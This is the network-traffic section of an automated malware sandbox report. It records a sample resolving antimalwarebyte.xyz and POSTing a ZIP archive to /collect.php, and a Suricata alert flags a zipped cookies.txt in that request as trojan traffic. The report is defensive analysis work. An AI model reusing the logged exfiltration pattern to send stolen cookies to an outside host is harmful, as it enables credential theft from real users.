Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| antimalwarebyte.xyz | 185.22.155.64 |
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:57661 239.255.255.250:3702
-
POST
200
http://antimalwarebyte.xyz/collect.php
REQUEST
RESPONSE
BODY
POST /collect.php HTTP/1.1
Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
User-Agent: uploader
Host: antimalwarebyte.xyz
Content-Length: 35555
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: text/html; charset=UTF-8
content-length: 0
date: Fri, 02 Jul 2021 07:14:07 GMT
server: LiteSpeed
vary: User-Agent
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49807 -> 185.22.155.64:80 | 2027104 | ET HUNTING Suspicious Zipped Filename in Outbound POST Request (cookies.txt) M2 | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts